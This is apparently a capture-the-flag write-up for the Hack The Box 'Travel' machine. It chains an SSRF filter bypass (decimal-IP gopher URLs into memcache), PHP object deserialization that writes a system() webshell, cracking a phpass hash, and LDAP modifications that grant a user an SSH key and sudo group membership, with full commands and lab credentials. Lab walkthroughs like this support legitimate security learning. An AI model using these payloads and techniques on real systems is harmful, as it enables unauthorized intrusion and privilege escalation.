Port scanning

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 13:12 CST
Nmap scan report for 10.10.10.189
Host is up (0.067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds
┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ sudo nmap -sT -sC -sV -O -p22,80,443 10.10.10.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 13:13 CST
Nmap scan report for 10.10.10.189
Host is up (0.061s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d3:9f:31:95:7e:5e:11:45:a2:b4:b6:34:c0:2d:2d:bc (RSA)
| 256 ef:3f:44:21:46:8d:eb:6c:39:9c:78:4f:50:b3:f3:6b (ECDSA)
|_ 256 3a:01:bc:f8:57:f5:27:a1:68:1d:6a:3d:4e:bc:21:1b (ED25519)
80/tcp open http nginx 1.17.6
|_http-title: Travel.HTB
|_http-server-header: nginx/1.17.6
443/tcp open ssl/http nginx 1.17.6
|_http-title: Travel.HTB - SSL coming soon.
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after: 2030-04-21T19:24:29
|_http-server-header: nginx/1.17.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (97%), Linux 3.7 (96%), Linux 3.2.0 (96%), Tomato 1.27 - 1.28 (Linux 2.4.20) (96%), Tomato 1.28 (Linux 2.4.20) (95%), MikroTik RouterOS 6.15 (Linux 3.3.5) (94%), ZoneAlarm Z100G WAP (94%), HP Onboard Administrator 4.01 (93%), HP Onboard Administrator 4.12 - 4.40 (93%), Linux 2.6.32 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.29 seconds

Adding hosts entries

10.10.10.189 www.travel.htb travel.htb blog.travel.htb blog-dev.travel.htb

There are quite a few sites, four in total. HTTPS does not seem to be up yet, blog-dev.travel.htb refuses access, and blog.travel.htb is a WordPress instance. It has an admin user; brute-forcing the password with rockyou produced nothing.

Code review

However, an exposed git repository was found at http://blog-dev.travel.htb/.git/ . After dumping it, there are two PHP files.

template.php:

<?php

/**
Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
// this should be secure
$tmpUrl = urldecode($url);
if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
{
die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
}
if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
{
die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
}
$tmp = parse_url($url, PHP_URL_HOST);
// preventing all localhost access
if($tmp == "localhost" or $tmp == "127.0.0.1")
{
die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");
}
return $url;
}

function url_get_contents ($url) {
$url = safe($url);
$url = escapeshellarg($url);
$pl = "curl ".$url;
$output = shell_exec($pl);
return $output;
}


class TemplateHelper
{

private $file;
private $data;

public function __construct(string $file, string $data)
{
$this->init($file, $data);
}

public function __wakeup()
{
$this->init($this->file, $this->data);
}

private function init(string $file, string $data)
{
$this->file = $file;
$this->data = $data;
file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
}
}

There is a safe() function that screens the URL for keywords to stop SSRF: it urldecodes the input and rejects file://, @, -o and -F (the last two are curl options; since the URL is wrapped in escapeshellarg() anyway, that check is redundant), then compares the host returned by parse_url() against exactly "localhost" and "127.0.0.1". Then there is a TemplateHelper class with some initialisation magic methods. Its __wakeup() is triggered on unserialize() and calls init(), which writes the contents of data to a file named by file under __DIR__/logs/, so we can try writing a webshell with it.

rss-template.php

<?php
/*
Template Name: Awesome RSS
*/
include('./template.php');
get_header();
?>

<main class="section-inner">
<?php
function get_feed($url)
{
require_once ABSPATH . '/wp-includes/class-simplepie.php';
$simplepie = null;
$data = url_get_contents($url);
if ($url) {
$simplepie = new SimplePie();
$simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
//$simplepie->set_raw_data($data);
$simplepie->set_feed_url($url);
$simplepie->init();
$simplepie->handle_content_type();
if ($simplepie->error) {
error_log($simplepie->error);
$simplepie = null;
$failed = True;
}
} else {
$failed = True;
}
return $simplepie;
}

$url = $_SERVER['QUERY_STRING'];
if (strpos($url, "custom_feed_url") !== false) {
$tmp = (explode("=", $url));
$url = end($tmp);
} else {
$url = "http://www.travel.htb/newsfeed/customfeed.xml";
}
<SNIP>
<!--
DEBUG
<?php
if (isset($_GET['debug'])) {
include('debug.php');
}
?>
-->

<?php get_template_part('template-parts/footer-menus-widgets'); ?>

<?php
get_footer();

RSS is a feature for aggregating updates from several sites into one place; from the code above, the site uses SimplePie, the RSS library bundled with WordPress.

The SimplePie class can be found at:

https://github.com/WordPress/WordPress/blob/master/wp-includes/class-simplepie.php

Look first at get_feed(), which fetches an RSS feed from the given URL and also caches it. It is then called with a URL derived from the query string: the code checks whether the query string contains "custom_feed_url", splits the whole string on "=" into an array and takes the last element as $url (so a feed URL that itself contains "=" would be truncated).

For example:

<?php
$url = 'http://example.com/?custom_feed_url=xxx';
if (strpos($url, "custom_feed_url") !== false) {
$tmp = (explode("=", $url));
var_dump($tmp);
$url = end($tmp);
} else {
$url = "http://www.travel.htb/newsfeed/customfeed.xml";
}
print_r($url);

The output is:

[Running] php "c:\Users\mikannse\Desktop\Untitled-1.php"
array(2) {
[0]=>
string(35) "http://example.com/?custom_feed_url"
[1]=>
string(3) "xxx"
}
xxx

At the end, debug.php is included whenever a debug parameter is passed, and in the page source you can see something like:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?debug' |grep xct
| xct_4e5612ba07(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |

Judging by the form, that is the serialized value stored in memcache. So the layout is: a key made of a prefix plus a hash, followed by a serialized string.

Getshell

This hash is the URL hashed with MD5 and then hashed again: SimplePie uses md5($url) as the cache name (its default cache_name_function), and the memcache handler then prefixes md5("$name:$type"), with $type = 'spc'. See the constructor in the Memcache.php cache handler:

public function __construct($location, $name, $type) {
$this->options = array(
'host' => '127.0.0.1',
'port' => 11211,
'extras' => array(
'timeout' => 3600, // one hour
'prefix' => 'simplepie_',
),
);
$this->options = SimplePie_Misc::array_merge_recursive($this->options, SimplePie_Cache::parse_URL($location));

$this->name = $this->options['extras']['prefix'] . md5("$name:$type");

$this->cache = new Memcached();
$this->cache->addServer($this->options['host'], (int)$this->options['port']);
}

So the plan is to write our own serialized string into memcache and get it unserialized. The serialized data SimplePie writes is not under our control, though, so to talk to memcache://127.0.0.1:11211 directly we need to combine this with the SSRF.

A tool that helps a lot with SSRF payloads is https://github.com/tarunkant/Gopherus ; it has a phpmemcache mode that turns a serialized payload into a gopher:// SSRF URL.

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ ./gopherus.py --exploit phpmemcache


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$


This is usable when you know Class and Variable name used by user

Give serialization payload
example: O:5:"Hello":0:{} : test payload

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20payload%0d%0a

After everything done, you can delete memcached item by using this payload:

gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

-----------Made-by-SpyD3r-----------

One remaining problem is the 127.0.0.1 filter in template.php's safe(), but since it only does an exact string comparison on the host, writing the address as its 32-bit decimal integer (2130706433, i.e. 0x7F000001) slips past it while curl still connects to loopback. Test it first:

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20payload%0d%0a'
┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?debug' | grep '^| '
| SpyD3r | test payload |
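To make the bypass concrete, here is an added example (not from the original writeup) that ports the page's safe() check to Python and pairs it with an inet_aton-style address parser. It shows why 2130706433 gets through, and it goes beyond the page by listing other spellings of 127.0.0.1 (hex, octal, short forms) that the filter would also pass; the page verified only the decimal form against the target, so the other candidates are assumptions to be tested against the target's resolver.

```python
import ipaddress
from urllib.parse import unquote_plus, urlsplit


def inet_aton_like(host):
    """Parse an IPv4 literal the way the C library's inet_aton() does: each
    dotted part may be decimal, 0x-hex or 0-octal, and 1 to 4 parts are
    allowed (the last part fills the remaining bytes). Returns a dotted quad
    or raises ValueError for anything that is not a numeric address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(host)
    vals = []
    for p in parts:
        if p[:2].lower() == "0x":
            vals.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            vals.append(int(p, 8))
        else:
            vals.append(int(p, 10))
    *lead, last = vals
    last_bits = 8 * (5 - len(vals))  # 32, 24, 16 or 8 bits for the final part
    if any(v > 255 for v in lead) or last >= 1 << last_bits:
        raise ValueError(host)
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << last_bits) | last
    return str(ipaddress.IPv4Address(n))


def safe_allows(url):
    """Python port of the page's safe(): keyword checks on urldecode($url),
    then an exact string compare of parse_url()'s host against
    'localhost' / '127.0.0.1'. Returns True when the URL would be let through."""
    decoded = unquote_plus(url)
    if "file://" in decoded or "@" in decoded:
        return False  # the "LFI" branch
    if "-o" in decoded or "-F" in decoded:
        return False  # the "command injection" branch
    netloc = urlsplit(url).netloc
    host = netloc.rsplit(":", 1)[0] if ":" in netloc and not netloc.endswith("]") else netloc
    if host in ("localhost", "127.0.0.1"):
        return False  # the "internal SSRF" branch
    return True


def loopback_bypasses(candidates, port=11211):
    """Return the candidate hosts that pass safe() yet parse to 127.0.0.1."""
    hits = []
    for h in candidates:
        try:
            resolved = inet_aton_like(h)
        except ValueError:
            continue  # not a numeric literal (e.g. 'localhost')
        url = f"gopher://{h}:{port}/_%0d%0astats%0d%0a"
        if resolved == "127.0.0.1" and safe_allows(url):
            hits.append(h)
    return hits


# Constructed candidate list: the page verified 2130706433 against the box;
# the rest are other inet_aton spellings of 127.0.0.1 (assumed, to be tested).
CANDIDATES = ["127.0.0.1", "localhost", "2130706433", "0x7f000001",
              "0177.0.0.1", "127.1", "0x7f.1"]

if __name__ == "__main__":
    for h in loopback_bypasses(CANDIDATES):
        print(f"{h:>12} -> {inet_aton_like(h)}  passes safe()")
```

The lesson for the defender side is the same one the box teaches: a denylist on the textual host is not a loopback check. Resolve the host first and compare the resulting address against the loopback and private ranges (ipaddress.ip_address(...).is_loopback), or better, allowlist schemes and destinations.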

Using the TemplateHelper class from earlier, write a payload that drops a webshell:

<?php
class TemplateHelper
{
public $file;
public $data;
public function __construct()
{
$this->file = 'shell.php';
$this->data = '<?php system($_GET["cmd"]); ?>';
}
}
$obj = new TemplateHelper();
echo serialize($obj);
?>
┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ php 1.php
O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";}

So how do we trigger the unserialize, i.e. __wakeup()? SimplePie checks the cache before fetching: when the key for the requested URL exists in memcache, the stored value is unserialized. So the hash in the key we write must match the URL we will request. Generate the payload first:

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ ./gopherus.py --exploit phpmemcache


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$


This is usable when you know Class and Variable name used by user

Give serialization payload
example: O:5:"Hello":0:{} : O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";}

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a

After everything done, you can delete memcached item by using this payload:

gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

-----------Made-by-SpyD3r-----------

URL-decoded, the payload is:

set SpyD3r 4 0 103
O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";}

We only need to replace SpyD3r (the tool author's name) with the key for the URL we are going to request. That URL can be anything as long as we compute its key; here a local web server serves it:

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ echo -n "$(echo -n 'http://10.10.14.13:8000/' | md5sum | cut -d' ' -f1):spc" | md5sum
9e80b1122657c41da80bc26babf4758b -

So replace SpyD3r with xct_9e80b1122657c41da80bc26babf4758b, and the payload to send is:

gopher://2130706433:11211/_%0d%0aset%20xct_9e80b1122657c41da80bc26babf4758b%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a

Write the serialized string into memcache:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/_%0d%0aset%20xct_9e80b1122657c41da80bc26babf4758b%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a'>/dev/null

Then trigger the unserialize. The query string only has to contain the substring custom_feed_url, and the last "="-separated piece, http://10.10.14.13:8000/, becomes the feed URL, which is why the request is shaped like this:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url&url=http://10.10.14.13:8000/' > /dev/null

The webshell lands in __DIR__/logs/shell.php.

__DIR__ is the theme directory, which the README in the .git repository earlier shows to be wp-content/themes/twentytwenty.

So the webshell should be at http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

┌──(mikannse㉿kali)-[~]
└─$ curl 'http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=whoami'
www-data

Success!!

Set up a reverse shell from here.

Privilege escalation

Checking the IP shows we are actually inside a container. wp-config.php gives the database credentials:

/** MySQL database username */
define( 'DB_USER', 'wp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );

But since the shell is not a full TTY and there is no python on the box, the way to reach the database is to forward the port back to Kali:

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ ./chisel server -p 10000 --reverse
2024/09/12 19:15:34 server: Reverse tunnelling enabled
2024/09/12 19:15:34 server: Fingerprint maha+AY0Cl6xcZuNtZFb+EIgAoGvCza/5/AJV7DEhKY=
2024/09/12 19:15:34 server: Listening on http://0.0.0.0:10000
www-data@blog:/tmp$ ./chisel client 10.10.14.13:10000 R:3306:127.0.0.1:3306 &
./chisel client 10.10.14.13:10000 R:3306:127.0.0.1:3306 &
[1] 442
www-data@blog:/tmp$ 2024/09/12 11:05:51 client: Connecting to ws://10.10.14.13:10000
2024/09/12 11:05:52 client: Connected (Latency 64.784414ms)
┌──(mikannse㉿kali)-[~]
└─$ mysql -h 10.10.14.13 -P 3306 -u wp -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5212
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

This gives:

admin      | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/

rockyou cannot crack it. However, there is another WordPress install under /opt with an SQL backup in it:

/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/','admin','admin@travel.htb','http://localhost','2020-04-13 13:19:01','',0,'admin'),(2,'lynik-admin','$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.','lynik-admin','lynik@travel.htb','','2020-04-13 13:36:18','',0,'Lynik Schmidt');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ echo '$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.'>hash

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1stepcloser (?)
1g 0:00:00:15 DONE (2024-09-12 19:24) 0.06591g/s 48170p/s 48170c/s 48170C/s 1stuna..1lovemac
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

That gives lynik-admin:1stepcloser, which logs straight in over SSH. Once inside, port 35467 is also found listening on the internal network.

The home directory contains a .ldaprc, which looks like an LDAP client configuration, and the server appears to be running in a container:

lynik-admin@travel:~$ ping ldap.travel.htb
PING ldap.travel.htb (172.20.0.10) 56(84) bytes of data.
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=1 ttl=64 time=0.063 ms
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=2 ttl=64 time=0.040 ms
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=3 ttl=64 time=0.050 ms

Besides that, .viminfo still holds the deleted bind password used to connect to LDAP: Theroadlesstraveled. Query all objects in the directory:

lynik-admin@travel:~$ ldapsearch -x -h 172.20.0.10 -b "dc=travel,dc=htb" -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled "(objectClass=*)" *
# extended LDIF
#
# LDAPv3
# base <dc=travel,dc=htb> with scope subtree
# filter: (objectClass=*)
# requesting: user.txt
#

# travel.htb
dn: dc=travel,dc=htb

# admin, travel.htb
dn: cn=admin,dc=travel,dc=htb

# servers, travel.htb
dn: ou=servers,dc=travel,dc=htb

# lynik-admin, travel.htb
dn: cn=lynik-admin,dc=travel,dc=htb

# workstations, travel.htb
dn: ou=workstations,dc=travel,dc=htb

# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb

# windows, servers, travel.htb
dn: ou=windows,ou=servers,dc=travel,dc=htb

# users, linux, servers, travel.htb
dn: ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# groups, linux, servers, travel.htb
dn: ou=groups,ou=linux,ou=servers,dc=travel,dc=htb

# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# brian, users, linux, servers, travel.htb
dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# frank, users, linux, servers, travel.htb
dn: uid=frank,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# jerry, users, linux, servers, travel.htb
dn: uid=jerry,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# lynik, users, linux, servers, travel.htb
dn: uid=lynik,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# edward, users, linux, servers, travel.htb
dn: uid=edward,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# eugene, users, linux, servers, travel.htb
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# gloria, users, linux, servers, travel.htb
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# johnny, users, linux, servers, travel.htb
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# louise, users, linux, servers, travel.htb
dn: uid=louise,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# christopher, users, linux, servers, travel.htb
dn: uid=christopher,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# domainusers, groups, linux, servers, travel.htb
dn: cn=domainusers,ou=groups,ou=linux,ou=servers,dc=travel,dc=htb

# search result
search: 2
result: 0 Success

# numResponses: 22
# numEntries: 21

Nothing of use here. Note that the unquoted * in that ldapsearch was expanded by the shell to the user.txt file in the home directory (the output says requesting: user.txt), which is why only DNs came back; quote it as '*' to get the attributes. Looking at sshd_config instead gives a different lead:

lynik-admin@travel:~$ cat /etc/ssh/sshd_config | grep -v '^#' | grep . 
Include /etc/ssh/sshd_config.d/*.conf
AuthorizedKeysCommand /usr/bin/sss_ssh_authorizedkeys
AuthorizedKeysCommandUser nobody
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
PasswordAuthentication no
Match User trvl-admin,lynik-admin
PasswordAuthentication yes

/usr/bin/sss_ssh_authorizedkeys prints the public keys SSSD holds for a user, and SSSD here is backed by that LDAP directory (the sshPublicKey attribute). So if we can write Kali's public key into a user's entry through LDAP with the lynik-admin bind, we can SSH in as that user.

Create an LDIF file:

lynik-admin@travel:/tmp$ cat ssh.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIgMc9PZn06GOz/V2GQ6aGKeqW+XoM9c80QdGimbPCL mikannse@kali

Then apply the modification:

lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/ssh.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

lynik-admin@travel:/tmp$ /usr/bin/sss_ssh_authorizedkeys johnny
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIgMc9PZn06GOz/V2GQ6aGKeqW+XoM9c80QdGimbPCL mikannse@kali

johnny now has a public key, and from Kali we can SSH in as him. Next, set a password for the user (not for SSH, which only allows password logins for trvl-admin and lynik-admin, but for the sudo prompt) and put him in the sudo group, gid 27 on Ubuntu:

lynik-admin@travel:/tmp$ cat sudo.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: gidNumber
gidNumber: 27
lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/sudo.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"
lynik-admin@travel:/tmp$ cat pass.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: userPassword
userPassword: hacker
lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/pass.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

Now we are root!

johnny@travel:~$ sudo su
[sudo] password for johnny:
root@travel:/home@TRAVEL/johnny# id
uid=0(root) gid=0(root) groups=0(root)

Closing thoughts

I originally just wanted to pick a random deserialization box to play with, and ended up picking a hell-difficulty one; it is one of the hardest boxes I have done. But since I chose it, I had to finish it on my knees if necessary: reading a writeup, debugging and reviewing the PHP locally myself, I ground through it. SSRF plus deserialization plus source code review; honestly I got a bit lazy and did not review the SimplePie source. The internal LDAP was also something completely new to me.